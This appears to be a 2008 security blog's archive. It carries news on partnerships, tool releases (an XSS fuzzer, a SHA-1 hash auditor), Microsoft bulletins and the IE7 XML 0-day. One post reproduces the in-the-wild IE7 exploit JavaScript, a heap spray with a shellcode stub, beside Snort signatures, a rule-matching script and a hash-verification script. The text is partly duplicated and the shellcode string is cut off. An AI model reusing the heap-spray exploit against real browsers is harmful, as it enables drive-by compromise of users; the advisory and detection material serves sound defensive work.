December 13, 2008: Revised to add the workaround, Disable XML Island functionality. Also, in a FAQ entry, clarified the list of recommended workarounds and added the blog post URL for recommended workarounds.

December 15, 2008: Updated the workarounds, DisableXMLIsland functionality and Disable Row Position functionality of OLEDB32.dll.

December 17, 2008: Advisory updated to reflect publication of security bulletin.

NOTE: All of the above are from the ***OFFICIAL*** Microsoft Security Bulletin. has given a really good description of the "Microsoft Security Advisory: Vulnerability in Internet Explorer could allow remote code execution".

- EF

SPAM & Phishing Detection Framework is now working on setting up a SPAM and Phishing Detection framework. We will be releasing our architecture soon, which will be followed by the full release of the framework.

If you think that you could help us, or if you wish to volunteer by any other means contact us at contact.fingers @

- EF

Tuesday, December 16, 2008

& are now Partners

We welcome our new research partner, for an extended partnership in malware analysis and more. Check out their malware analysis tool, Advance Malware Identification & Removal (AMIR):

" Advance Malware Identification & Removal is an application that will help you to quickly identify any unwanted process (except RootKit) running in your system. Also it will give you the option to remove them easily. Once AMIR runs in the system, it will highlight (with color) the possible suspect programs and also give you a lot of other relevant information about the process. It shows you PE Details, actual Memory Dumps of the running process and also the various Resources used by the binary. It even has a Heuristic Scanner that can sniff out Malicious code from .vbs, .inf, .bat files. AMIR can also enable Regedit, Task Manager & Folder Option that has been locked by Malware activity. Armed with numerous state of art options, it becomes very easy to detect any kind of Malware (except RootKit) running in the system. "

If you have any questions on partnership, feel free to contact us at contact.fingers @

- EF

Monday, December 15, 2008

Threat Analysis Framework/ ThreatDB Architecture

Threat - Defining a threat depends on what you are looking for and who you are. A threat is something that could stop or obstruct one's functioning or working; in other words, anything that could potentially obstruct, damage or destroy someone or something. This is not a rigorous definition, but our plan here is not to discuss semantics. We are planning a project to unify all the good resources available to the security community [intrusion defense to start with] around the world, so that they can be used in the course of engineering and analysis. To start this effort, we have contacted NVD, EmergingThreats and milw0rm to use their resources to make this project happen.

Threat Analysis: Architecture

Vulnerabilities, exploits and general traffic are used to produce signatures and PCAPs. Once this is done, we map all of it into one utility to produce the threat analysis page. The backend for mapping all this data is our threatDB.

Apart from using EmergingThreats signatures, we will also be generating our own. To start this initiative, we will have PCAPsDB, VulnDB and ExploitDB mapped to each other, and then SigDB mapped to all of them. We have already started generating PCAPs and now have around 800+ PCAPs of malicious data. We are releasing the browser exploit PCAPs from the milw0rm listings in our next release.

We have talked to all of the sites listed above. EmergingThreats reserves copyright for its signatures, and milw0rm reserves copyright for its exploits.

All questions and comments are most welcome. If you have any other questions or if you wish to participate in any of our projects, kindly contact us at contact.fingers {at}

- EF

Sunday, December 14, 2008

Threat Analysis Framework

We are working on a threat analysis framework for our Projects section. We are looking for PHP developers and Perl/Python/Ruby script writers, to be filled immediately.

The developer we are looking for will have a few years' experience developing websites in PHP, and should have experience with XML/XSLT parsers and backend work too.

Contact us immediately if you have any questions relating to this position at contact.fingers @

- EF

Saturday, December 13, 2008

The Academy Pro is our new Publicity Partner

The Academy Pro joins our Publicity partners group. Check out their site. You need to sign in to access their videos.

About The Academy Pro...

"The Academy provides instructional videos for the information security community. For the first time ever, the average user to the most seasoned industry expert will be able to watch instructional videos on how to install popular products, address common configuration issues, and troubleshoot difficult problems. The Academy is a user driven community and videos are created at the request of its members. Vendors can also leverage the site to showcase the features and capabilities of their products. The Academy is an ideal place to find and share knowledge with others practicing or interested in the information security field."

Contact us if you have any questions, if you wish to be our partner, or for anything else. Contact us if you have some time and you don't know what to do with it... contact.fingers @ is where you could reach us.

- EF

Friday, December 12, 2008

Latest updates @ EF

Our Patch Tuesday analyst (Ion Visser) is back once again.

NoVirusThanks & EvilFingers are working on creating a threat analysis framework.

Thanks to Kris Kaspersky for his wonderful Russian research publications; we have published 88 so far and have 400+ more to publish.

Jack O'Neill is working on the Honeypot Framework.

Kirk McGraw is working on the next update of Process Memory Dumper.

Gerasimos Kassaras will be releasing a GUI version of SiXFu pretty soon.

Kevin Devine is working on the next version of GSAuditor, which will come with a multi-core bruteforcer.

Aditya K Sood is researching Google Chrome.

Giuseppe Bonfa is working on more research publications.

Praveen Darshanam is working on our PCAP section.

Mountassif Moad / Stack is working on our vulnerability analysis division.

We will be coming up with a design for the Threat Analysis Framework pretty soon.

If you have any questions please do contact us at contact.fingers @

- EF

Thursday, December 11, 2008

IE7 Updates from


IE7 0DAY attack code is already being used in drive-by download (挂马) attacks

Posted by monk on 2008, December 10, 8:47 AM. Filed in Vulnerability Collection

# Guizai (鬼仔): the IE7 0day just posted



The KnownSec team (知道安全团队) recently captured malicious code that attacks an out-of-bounds memory vulnerability in IE7. The vulnerability leaked within a small circle in November and was only fully sold and circulating in the black market around December 9; someone has rushed out a drive-by page generator for it, and we expect it to become very widespread in the short term.

Under certain constructed conditions, SDHTML detects an error and frees an object that has already been allocated; but after freeing it, SDHTML does not return and instead continues executing with the freed object's memory. If that memory has been reallocated for another purpose, SDHTML will treat it as an object. The 0-day drive-by pages use an XML SRC string object to occupy the space of the freed object, and because the object pointer contains function routine pointers, this finally leads to code execution.

2. Enable DEP protection:

if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");
function sleep(milliseconds)
{
var start=new Date().getTime();
for(var i=0;i<1e7;i++)
{if((new Date().getTime()-start)>milliseconds)
{break}
}
}
function spray(sc)
{
var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));
var heapBlockSize=0x100000;
var payLoadSize=infect.length*2;
var szlong=heapBlockSize-(payLoadSize+0x038);
var retVal=unescape("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong);
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
zzchuck=new Array();
for(i=0;i< aaablk;i++){zzchuck[i]=retVal+infect}
}
function getSampleValue(retVal,szlong)
{
while(retVal.length*2 < szlong)
{retVal+=retVal}
retVal=retVal.substring(0,szlong/2);
return retVal
}
var a1="dadong";
spray(a1+"9090"+a1+"dadong9090da
sleep(3000);
nav=navigator.userAgent.toLowerCase();
if(navigator.appVersion.indexOf('MSIE')!=-1)
{
version=parseFloat(navigator.appVersion.split('MSIE')[1])
}
if(version==7)
{
w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
if(wxp||w2k3)document.write('< ! [ CDATA[< ! [ CDATA[>]]>');
var i=1;while(i<=10)
{
window.status=" ";i++}
}

Translated version:

# Guizai (鬼仔): the IE7 0day just posted

Source: KnownSec (知道安全)

Given the danger of this vulnerability, as Microsoft's domestic security service provider in China we published an advisory at the first opportunity, analysed the details of the vulnerability and submitted them to the relevant Microsoft department in the US; the specific details will not be published here.

The KnownSec team (知道安全团队) recently captured malicious code that attacks an out-of-bounds memory vulnerability in IE7. The vulnerability leaked within a small circle in November and was only fully sold and circulating in the black market around December 9; someone has rushed out a drive-by page generator for it, and we expect it to become very widespread in the short term.

When our monitoring system first captured this vulnerability, our team did not analyse it in detail; we assumed it was an already patched vulnerability, and since many drive-by pages and code posts had been found on the net we assumed it was not a 0-day, so the code circulating on the net and the code of the drive-by pages were pasted into an internal share and leaked out. This was our mistake :(


IE7's XML handling contains a vulnerability that can cause out-of-bounds memory access; by crafting malformed XML and using JavaScript to manipulate the shellcode, arbitrary code can be executed.

Rumours of an IE7 vulnerability began circulating in the second half of 2008; around October it began to leak through private sales, in November it entered black-market trading, and people started selling it through face-to-face negotiation.

It finally appeared on the net in December: large numbers of second- and third-hand copies of the vulnerability circulated at the operational layer of the black market, from early December many people bought second-hand code to develop generators, and on the 9th it began to appear in drive-by attacks.


Affected versions:


An error in the way SDHTML handles objects leads to memory corruption.
Under certain constructed conditions, SDHTML detects an error and frees an object that has already been allocated; but after freeing it, SDHTML does not return and instead continues executing with the freed object's memory. If that memory has been reallocated for another purpose, SDHTML will treat it as an object. The 0-day drive-by pages use an XML SRC string object to occupy the space of the freed object, and because the object pointer contains function routine pointers, this finally leads to code execution.

Since the vulnerability has not yet been patched, please wait for Microsoft's official patch release for detailed reference.


1. Watch the official Microsoft website and download the patch promptly.

2. Enable DEP protection:

System Properties - Advanced - Performance - Data Execution Prevention

This can prevent malicious attacks.

3. Add the two malicious domains to the HOSTS file to block them.

Copy the following lines into HOSTS:

buhu: to add a section to use code
JavaScript code... Same as above


Unpatched IE7 0-day extended... has released a few signatures for the unpatched IE7 0-day:

#by Joshua Gimer
(msg:"ET CURRENT_EVENTS Possible XML 0-day for Internet
Explorer Exploitation Attempt"; flow:established,from_server; content:"document.write('"; nocase;
classtype:web-application-attack; reference:url,; sid:2008876; rev:3;)

#by matt jonkman, re
(msg:"ET CURRENT_EVENTS Possible XML 0-day for
Internet Explorer Exploitation Attempt (obfuscation 1)"; flow:established,from_server; content:"|7c|XML|7c 7c|if|7c|SPAN|7c|navigator|7c|CDATA|7c|http|7c
|com|7c|w2k3|7c|appVersion|7c|version|7c|nt|7c 7c|X|7c|MSIE|7c|wxp|7c|114|7c|HTML|7c|DATAFLD|7c
reference:url,; sid:2008877; rev:2;)
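The two signatures above, worked through as an added example that is not EvilFingers' or Emerging Threats' code: a small Python matcher that parses each rule's content option (the |7c| hex escapes and the nocase modifier included) and runs it over constructed response bodies, which makes visible how literal the match is (a double-quoted document.write does not fire 2008876). It assumes the rule headers, which the page does not show, and copies the second rule's content only as far as the page does.

```python
"""Content matcher for the two Emerging Threats rules quoted above (added
example): content:"..." with |xx| hex escapes, nocase, msg and sid are
handled; flow/classtype/reference/rev are parsed and ignored."""

# Option strings copied from the rules above (headers not on the page and not
# needed for a payload-only match). The second rule's content is cut off on
# the page, so this constructed copy stops where the page does.
RULES = [
    '(msg:"ET CURRENT_EVENTS Possible XML 0-day for Internet Explorer '
    'Exploitation Attempt"; flow:established,from_server; '
    'content:"document.write(\'"; nocase; classtype:web-application-attack; '
    'reference:url,; sid:2008876; rev:3;)',
    '(msg:"ET CURRENT_EVENTS Possible XML 0-day for Internet Explorer '
    'Exploitation Attempt (obfuscation 1)"; flow:established,from_server; '
    'content:"|7c|XML|7c 7c|if|7c|SPAN|7c|navigator|7c|CDATA|7c|http|7c|com'
    '|7c|w2k3|7c|appVersion|7c|version|7c|nt|7c 7c|X|7c|MSIE|7c|wxp|7c|114'
    '|7c|HTML|7c|DATAFLD|7c"; reference:url,; sid:2008877; rev:2;)',
]

# Constructed server->client response bodies, not real captures.
SAMPLES = {
    # double-quoted document.write: 2008876 only matches the ( ' form
    'benign-page': b'<script>document.write("<p>hello</p>");</script>',
    'plain-docwrite': b"<script>if(wxp||w2k3)document.write('<span>');</script>",
    # packer dictionary of an obfuscated copy, which is what 2008877 keys on
    'packed-js': b"<script>eval(function(p,a,c,k,e,d){return p}('0',9,9,"
                 b"'|XML||if|SPAN|navigator|CDATA|http|com|w2k3|appVersion"
                 b"|version|nt||X|MSIE|wxp|114|HTML|DATAFLD|'.split('|')))"
                 b"</script>",
}

def split_options(body):
    """Split the option body on ';' characters outside double quotes."""
    opts, cur, in_quote, escaped = [], [], False, False
    for ch in body:
        if escaped:
            escaped = False
        elif ch == '\\' and in_quote:
            escaped = True
        elif ch == '"':
            in_quote = not in_quote
        elif ch == ';' and not in_quote:
            opts.append(''.join(cur).strip())
            cur = []
            continue
        cur.append(ch)
    return opts + ([''.join(cur).strip()] if ''.join(cur).strip() else [])

def unquote(value):
    value = value.strip()
    return value[1:-1] if value[:1] == value[-1:] == '"' else value

def decode_content(raw):
    """Snort content -> bytes: |..| holds hex, the rest is literal text."""
    out, in_hex = bytearray(), False
    for chunk in raw.split('|'):
        if in_hex:
            out.extend(bytes.fromhex(chunk))
        else:
            i = 0
            while i < len(chunk):
                if chunk[i] == '\\' and i + 1 < len(chunk):
                    i += 1  # keep only the escaped character
                out.extend(chunk[i].encode('latin-1'))
                i += 1
        in_hex = not in_hex
    return bytes(out)

def parse_rule_options(rule):
    """Return {'msg', 'sid', 'contents': [{'bytes', 'nocase'}, ...]}."""
    body = rule.strip()
    if body.startswith('(') and body.endswith(')'):
        body = body[1:-1]
    parsed = {'msg': None, 'sid': None, 'contents': []}
    for opt in split_options(body):
        name, _, value = opt.partition(':')
        name = name.strip()
        if name == 'msg':
            parsed['msg'] = unquote(value)
        elif name == 'sid':
            parsed['sid'] = int(value)
        elif name == 'content':
            parsed['contents'].append(
                {'bytes': decode_content(unquote(value)), 'nocase': False})
        elif name == 'nocase' and parsed['contents']:
            parsed['contents'][-1]['nocase'] = True  # modifies last content
    return parsed

def rule_matches(rule, payload):
    """Every content must occur (offset/order modifiers: not needed here)."""
    def found(c):
        hay, needle = payload, c['bytes']
        if c['nocase']:
            hay, needle = hay.lower(), needle.lower()
        return needle in hay
    return bool(rule['contents']) and all(found(c) for c in rule['contents'])

def scan(rules=RULES, samples=SAMPLES):
    """Map each sample label to the sids of the rules that fire on it."""
    parsed = [parse_rule_options(r) for r in rules]
    return {label: [r['sid'] for r in parsed if rule_matches(r, body)]
            for label, body in samples.items()}
```

Calling scan() returns {'benign-page': [], 'plain-docwrite': [2008876], 'packed-js': [2008877]}; a variant that re-orders the packer dictionary or builds the string at runtime would slip past both rules.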

Revision history of the signatures for IE7 0day can be found HERE. has released more information on this, which can be found HERE.

If the above link has changed, here is the information that was given in the above link:

Wednesday, 10 December 2008
IE7 0-Day Exploit Sites

As many of you have seen, there is a new 0-day exploit in the wild affecting Internet Explorer 7 users. This is a new exploit that is being actively exploited and it was not patched yesterday (meaning there is no patch available, yet). Visiting a website with this exploit can result in a full compromise of an affected system. Currently most of the exploits out there will attempt to download a trojan onto the system. Shadowserver is aware of several hosts which are currently hosting exploit code designed to exploit this vulnerability. We would like to share this information so that it can be used for protection and detection. However, we strongly discourage visiting these sites for any reason. DO NOT visit the below sites as they currently house live exploit code for the new IE7 0day exploit. The majority if not all of them also house several other exploits for different vulnerabilities as well.

We came across a good many of these ourselves while we also had help from others in the security community that shared the sites. We would like to thank them as the information can now be passed on to you for mitigation. If you know any other sites that can be added to this list of IE7 exploit sites (for the current 0day issue), please drop us a line - steven [at] shadowserver [dot] org.

Domains known to be currently exploiting this vulnerability:

-- The above list is the data we have as of December 10, 2008 - 20:26 UTC/GMT--

Updated/additional sites:

The following sites have not been seen hosting the IE7 exploits but are closely associated with the above sites and should be considered for blocking/monitoring:

You may have noticed there are a relatively small number of IP addresses involved in our list. It appears that some of the attackers have created several domains with essentially the same set of exploits. We will be updating this list as we get more.
Detection and Prevention

Right now there are just a few things you can do to detect and prevent. Emerging Threats has a few Snort rules that have been released and you can get those by clicking here. However, these will only detect the specific unmodified variants they were written for, so do not consider these fool proof. It can't hurt to throw the rules in though!

Now for prevention, the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved. If you are aware of other fixes, please feel free to shoot them our way.

Updated: Microsoft has released a security advisory detailing this vulnerability here. There are additional workarounds now listed such as enabling DEP for IE7. Please take a look.

=>Posted December 10, 2008, at 12:22 PM by Steven Adair

And for getting more info on the exploits, check out yesterday's posting on Exploit release.

- EF

Wednesday, December 10, 2008

67 Total Russian Publications

67 Russian publications can be found at

Do let us know if you have any reviews or questions on anything. We apologize for the delay in the release of articles. We have 400 more Russian articles ready for the release, though we will be releasing on day-to-day basis.

Contact us at contact.fingers @

- EF

MS Internet Explorer XML Parsing Remote Buffer Overflow Exploit 0day (Generic & Specific[Vista])

0-days released for IE7 can be found at the following links:

MS Internet Explorer XML Parsing Remote Buffer Overflow Exploit 0day - Author: Guido Landi

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day - Author: Muts

- EF

Tuesday, December 9, 2008

Alert: IE7 0DAY attack code is already being used in drive-by download (挂马) attacks

This is the Chinese text from, translated into English.


Alert: IE7 0DAY attack code is already being used in drive-by download attacks

Release date: 2008-12-09 16:22 (GMT)

Last updated: 2008-12-09 18:13 (GMT)


Given the danger of this vulnerability, as Microsoft's domestic security service provider in China we published an advisory at the first opportunity, analysed the details of the vulnerability and submitted them to the relevant Microsoft department in the US; the specific details will not be published here.

The KnownSec team (知道安全团队) recently captured malicious code that attacks an out-of-bounds memory vulnerability in IE7. The vulnerability leaked within a small circle in November and was only fully sold and circulating in the black market around December 9; someone has rushed out a drive-by page generator for it, and we expect it to become very widespread in the short term.

When our monitoring system first captured this vulnerability, our team did not analyse it in detail; we assumed it was an already patched vulnerability, and since many drive-by pages and code posts had been found on the net we assumed it was not a 0-day, so the code circulating on the net and the code of the drive-by pages were pasted into an internal share and leaked out. This was our mistake :(

History:

IE7's XML handling contains a vulnerability that can cause out-of-bounds memory access; by crafting malformed XML and using JavaScript to manipulate the shellcode, arbitrary code can be executed.

Rumours of an IE7 vulnerability began circulating in the second half of 2008; around October it began to leak through private sales, in November it entered black-market trading, and people started selling it through face-to-face negotiation.

It finally appeared on the net in December: large numbers of second- and third-hand copies of the vulnerability circulated at the operational layer of the black market, from early December many people bought second-hand code to develop generators, and on the 9th it began to appear in drive-by attacks.

Analysis:

Affected versions:

System:



Browser:


Description:

An error in the way SDHTML handles objects leads to memory corruption.
Under certain constructed conditions, SDHTML detects an error and frees an object that has already been allocated; but after freeing it, SDHTML does not return and instead continues executing with the freed object's memory. If that memory has been reallocated for another purpose, SDHTML will treat it as an object. The 0-day drive-by pages use an XML SRC string object to occupy the space of the freed object, and because the object pointer contains function routine pointers, this finally leads to code execution.

Since the vulnerability has not yet been patched, please wait for Microsoft's official patch release for detailed reference.

Defense:

1. Watch the official Microsoft website and download the patch promptly.

2. Enable DEP protection:

System Properties - Advanced - Performance - Data Execution Prevention

This can prevent malicious attacks.

3. Add wwwwyyyyy.cn and sllwrnm5.cn to the HOSTS file to block them.

Copy the following lines into HOSTS:


- EF

Overwriting Hard Drive Data: The Great Wiping Controversy

The paper that Dave Kleiman, Shyaam Sundhar and I published on the use of an electron microscope with respect to data recovery is now available.


It is also being presented by me at ICISS 2008.

The abstract follows.

Dr Craig Wright GSE-Compliance, GSE-Malware

Title: Overwriting Hard Drive Data: The Great Wiping Controversy
Book Series: Lecture Notes in Computer Science
Publisher: Springer Berlin / Heidelberg
ISSN: 0302-9743 (Print) 1611-3349 (Online)
Volume: 5352/2008
Book: Information Systems Security
Book DOI: 10.1007/978-3-540-89862-7
Copyright: 2008
ISBN: 978-3-540-89861-0
Chapter DOI: 10.1007/978-3-540-89862-7_21
Pages: 243-257
Subject Collection: Computer Science
SpringerLink Date: Thursday, December 04, 2008

Often we hear controversial opinions in digital forensics on the required or desired number of passes to utilize for properly overwriting, sometimes referred to as wiping or erasing, a modern hard drive. The controversy has caused much misconception, with persons commonly quoting that data can be recovered if it has only been overwritten once or twice. Moreover, referencing that it actually takes up to ten, and even as many as 35 (referred to as the Gutmann scheme because of the 1996 Secure Deletion of Data from Magnetic and Solid-State Memory published paper by Peter Gutmann) passes to securely overwrite the previous data. One of the chief controversies is that if a head positioning system is not exact enough, new data written to a drive may not be written back to the precise location of the original data. We demonstrate that the controversy surrounding this topic is unfounded.

Keywords: Digital Forensics - Data Wipe - Secure Wipe - Format

Microsoft Bulletin Dec 9th 2008 Release

Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349): MS08-070

Vulnerabilities in GDI Could Allow Remote Code Execution (956802): MS08-071

Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173): MS08-072

Cumulative Security Update for Internet Explorer (958215): MS08-073

Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070): MS08-074

Vulnerabilities in Windows Search Could Allow Remote Code Execution (959349): MS08-075

Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807): MS08-076

Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175): MS08-077

Check out for more information.

- EF

Monday, December 8, 2008

IDA Pro Plugin Writers

Hey Readers,

First, thanks to Ion for jumping back into action once again. Secondly, we are desperately in need of plug-in writers for IDA Pro, as we have been planning to release some plug-ins for a while and have been stepping on our crunchy schedule. Kindly volunteer by mailing us at contact.fingers @

Even if you feel that you do not have time to work on anything outside your normal work, just contact us once and we will sit down with you and work out a schedule that benefits both you and us. We will ensure that every single volunteer of EvilFingers gets something or the other in return. This is EOV (Equal Opportunity Volunteering), which means that regardless of your region, sex or race, we will bring you in and ensure the best for both parties.

Rock on, guys!!!

- EF

Friday, December 5, 2008

Microsoft Advance Notification - December

After more than a month of my inactive status, let me share with you December's Advance Notification for MS Patch Tuesday. According to MS, 8 security bulletins are due for release, of which "Six Microsoft Security Bulletins rated as Critical and two rated as Important". Here is a brief overview:

- Windows Operating System (2 bulletins)
- Internet Explorer (this is always a little dicey, for it may have multiple CVE IDs)
- VB
- MS Word (may have multiple CVE IDs)
- MS Excel (may have multiple CVE IDs)
- Sharepoint

This Patch Tuesday is surely gonna be a little tougher than before with the exploits flowing in. Gear up! And, by the way, if you have any information regarding 'any' exploit or 'any' related vulnerability, feel free to contact us.

/best wishes/
- Ion

Reverse Engineering of Strong Crypto Signatures Schemes

Thanks to Giuseppe Bonfa a.k.a. 'EvilCry' for the hard-core analysis paper on Strong Crypto Signature Schemes. This paper can be found here.

Abstract: In this paper (Reverse Engineering of Strong Crypto Signatures Schemes) we will have the usual classical style of a CryptoReversing approach; what we are going to talk about is ECC, also known as Elliptic Curve Cryptography. After a theoretical study we will fly to the most common secured software applications with a touch of hardware security.

- EF

Thursday, December 4, 2008

Successful release of Russian publication!!!

We had a successful release of the Russian publication... Check out

- EF

Tuesday, December 2, 2008

Is Security a Myth or Reality?

Security has often been treated as a blanket laid over an existing toolkit or product. Some people consider security an add-on and business the primary factor. The problem is that security and business should be coordinated right from the architectural design, before the foundation is laid. A security-aware foundation acts like reinforced concrete: an architecture that considers both security and business is much stronger than a purely business-centric one. We at EvilFingers consider business and security to be two equally important factors, like two hands, two eyes or two legs: without one of them, the other is overloaded.

Security has been around since the age of empires, and so has the buying and selling of things. But security was given the most importance, through layered fortresses, forts and the like, while buying and selling was done for survival: food, shelter and so on. Ever since the industrial revolution kicked in, everything has run business-centric. Now we have passed the industrial revolution and are in the information era. In this era almost everything is run and controlled by computers, and things are semi-automated. That being the case, should security be a myth (something that may have existed in the past, based on history) or is it reality (something that should be considered the heart of a product, with business as its soul)?

Let us know your views. Contact us at contact.fingers @

- EF

Monday, December 1, 2008

Russian publications releasing soon!!!

Thanks to Kris Kaspersky, we will have over 470 Russian articles released soon at EvilFingers. Kris Kaspersky represents (EvilFingers Russian Community), as discussed in one of the previous blogs.

If you would like to contribute or if you have any questions, contact us at contact.fingers @

- EF

Saturday, November 29, 2008

Simple XSS Fuzzer v 1.0

We are proud to announce the release of our new tool, Simple XSS Fuzzer (SiX Fu) v 1.0.

Credit: Gerasimos Kassaras

Gerasimos Kassaras is a blogger for and

The work flow of SiX Fu is as follows:

We will be releasing a "How-to" document in the publication section as well as with the tool package. The tool would be released in the next few hours.

- EF

Our Ancestral Wealth!!!

If you wish to inherit all our ancestral wealth (US $125,000,000,000,000,000), kindly click on the following link asap:


- EF

Friday, November 28, 2008

Thanks Giving Sale!!!

Hey guys,

Just like any other shop (online or offline), we have opened up a sale just for you and only for this Thanksgiving 2008. Well, not really!!! We are releasing a new tool called GSAuditor, and yes, you can download it any day @ any point of time (starting from the day of release: Friday 28th Nov, 2008).

Generic SHA-1 Auditor (GSAuditor) is an application that allows you to brute-force password hashes derived from SHA-1. NOTE: GSAuditor is an "experimental" tool.

The current version of GSAuditor supports the following algorithms:

* RAW-SHA-1($password) - Mac OS 10.3 'Panther'
* SHA-1(UNICODE($password).$salt) - MS SQL 2000/2005 (remember that 2000 uses uppercase password!)
* SHA-1($password.$salt) - ORACLE 11g (the salt is currently 10 bytes)
* SHA-1($username.$password) - PHP
* SHA-1($salt.$password) - Mac OS 10.4 'Tiger'

GSAuditor is in the early stages of development, so if you encounter any bugs or want to request additional features, contact contact.fingers @ . Use the same address if you have any further questions.
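The five hash formats listed above differ only in what is fed to SHA-1 and in which order. The following Python is an added example (not part of GSAuditor or its source) that builds each of those digests and verifies a single candidate password against a stored hash; it is the kind of check an auditor runs over its own user table before deciding which accounts need a reset. Assumptions, since the post does not state them: "UNICODE($password)" is taken to mean UTF-16LE (the encoding MS SQL uses internally), all other strings are UTF-8, digests are compared as lowercase hex, and every sample password, salt and username below is constructed for the demo.

```python
"""Construct the SHA-1 password-hash variants from the GSAuditor list and
verify a candidate against a stored digest. Added example, not GSAuditor code."""
import hashlib
import hmac


def _sha1_hex(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


def raw_sha1(password: str) -> str:
    """RAW-SHA-1($password): Mac OS 10.3 'Panther' style (unsalted)."""
    return _sha1_hex(password.encode("utf-8"))


def mssql_sha1(password: str, salt: bytes, uppercase: bool = False) -> str:
    """SHA-1(UNICODE($password).$salt): MS SQL 2000/2005 style.
    Assumption: UNICODE() is UTF-16LE. MS SQL 2000 hashes the uppercased
    password, which is why the post warns it is case-insensitive."""
    if uppercase:
        password = password.upper()
    return _sha1_hex(password.encode("utf-16-le") + salt)


def oracle11g_sha1(password: str, salt: bytes) -> str:
    """SHA-1($password.$salt): Oracle 11g style; the post says the salt is 10 bytes."""
    if len(salt) != 10:
        raise ValueError("expected a 10-byte salt for the Oracle 11g format")
    return _sha1_hex(password.encode("utf-8") + salt)


def username_password_sha1(username: str, password: str) -> str:
    """SHA-1($username.$password): the PHP-application style from the list.
    Note there is no separator, so ('ab','c') and ('a','bc') collide."""
    return _sha1_hex((username + password).encode("utf-8"))


def salt_password_sha1(password: str, salt: bytes) -> str:
    """SHA-1($salt.$password): Mac OS 10.4 'Tiger' style (salt first)."""
    return _sha1_hex(salt + password.encode("utf-8"))


# Scheme name -> callable(candidate, **params). Names are this example's own.
SCHEMES = {
    "raw": lambda pw, **kw: raw_sha1(pw),
    "mssql2000": lambda pw, salt, **kw: mssql_sha1(pw, salt, uppercase=True),
    "mssql2005": lambda pw, salt, **kw: mssql_sha1(pw, salt),
    "oracle11g": lambda pw, salt, **kw: oracle11g_sha1(pw, salt),
    "php": lambda pw, username, **kw: username_password_sha1(username, pw),
    "tiger": lambda pw, salt, **kw: salt_password_sha1(pw, salt),
}


def verify_candidate(scheme: str, stored_hex: str, candidate: str, **params) -> bool:
    """Recompute the digest for one candidate and compare in constant time."""
    computed = SCHEMES[scheme](candidate, **params)
    return hmac.compare_digest(computed.lower(), stored_hex.strip().lower())


def demo() -> dict:
    """Constructed sample records: each stored digest is derived here from a
    known password so the check can be exercised offline."""
    salt10 = b"\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99"   # constructed 10-byte salt
    salt4 = b"\xde\xad\xbe\xef"                              # constructed MS SQL salt
    records = {
        "raw": (raw_sha1("Winter2008"), {}),
        "mssql2000": (mssql_sha1("Winter2008", salt4, uppercase=True), {"salt": salt4}),
        "oracle11g": (oracle11g_sha1("Winter2008", salt10), {"salt": salt10}),
        "php": (username_password_sha1("alice", "Winter2008"), {"username": "alice"}),
        "tiger": (salt_password_sha1("Winter2008", salt10), {"salt": salt10}),
    }
    results = {}
    for scheme, (stored, params) in records.items():
        results[scheme] = {
            "correct": verify_candidate(scheme, stored, "Winter2008", **params),
            "wrong": verify_candidate(scheme, stored, "winter2008", **params),
        }
    return results


if __name__ == "__main__":
    for scheme, outcome in demo().items():
        print(f"{scheme:10s} correct={outcome['correct']} lowercase-variant={outcome['wrong']}")
```

Running the demo shows the one property worth remembering from the list: for the MS SQL 2000 format the lowercase variant of the password also verifies, because the hash input is uppercased first, while every other scheme rejects it. The `php` helper also makes the missing-separator problem concrete: any split of the same concatenated string yields the same digest.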

PS: We do know that Thanksgiving was yesterday and the Black Friday sale is done already. But sometimes it takes time to realize that the vacation day has come to an end, only when you are almost awake. Cheers !!!

- EF

What is one thing according to you that could change our community?

We asked the following question to a gentleman from the infoSec community:
"What would be one thing according to you that could change our community for its best?"

He looked around for a while, and then said:
"When our community starts evaluating about 'what you know', more than 'whom do you know', then I am sure there is more opportunity for our community to auto-clean."

Isn't that a pinch of reality...

- EF

Thursday, November 27, 2008

"NoVirusThanks" on Projects Page

NoVirusThanks offers a free online detection service that analyzes suspicious and malicious files for viruses/worms, Trojans/backdoors and all kinds of malware, including bots, rootkits, etc., and not only those already detected by antivirus engines.

NoVirusThanks also publishes a blog with analyses of new or weird malware.

We have provided a page for all our users to submit their suspicious files to NoVirusThanks, which can be found

NOTE: This page is NOT intended for comparing AV's.

Let us know if you have any questions. Contact us at contact.fingers @

- EF

Tuesday, November 25, 2008

Developers Welcome!!!

We are looking for developers with knowledge in any of the following languages:
Scripting: Perl, Python, Shellscript, Ruby
Languages: C/C++, Java, VB, .Net

Contact us at contact.fingers @

- EF

Google Chrome MetaCharacter URI Obfuscation Vulnerability.

The latest Google Chrome vulnerability, MetaCharacter URI Obfuscation, disclosed by Aditya K Sood, reached the media today.

This is EvilFingers' 5th vulnerability finding in Google Chrome (3 in Sep 2008, 1 in Oct 2008 and 1 in Nov 2008).

Nov 24, 2008 Google Chrome MetaCharacter URI Obfuscation Vulnerability

Oct 20, 2008 Google Chrome OnBeforeUnload and OnUnload Null Check Vuln

Sep 27, 2008 Google Chrome Window Object Suppressing Remote DoS

Sep 23, 2008 Google Chrome Carriage Return Null Obj. Memory Exhaustion Remote DoS

Sep 2, 2008 Google Chrome Browser in chrome.dll

The latest finding was released on 24th Nov 2008, after the security update that fixed a URL spoofing flaw aimed at pop-ups.

Some websites that listed the latest flaw:

For more details contact us.

- EF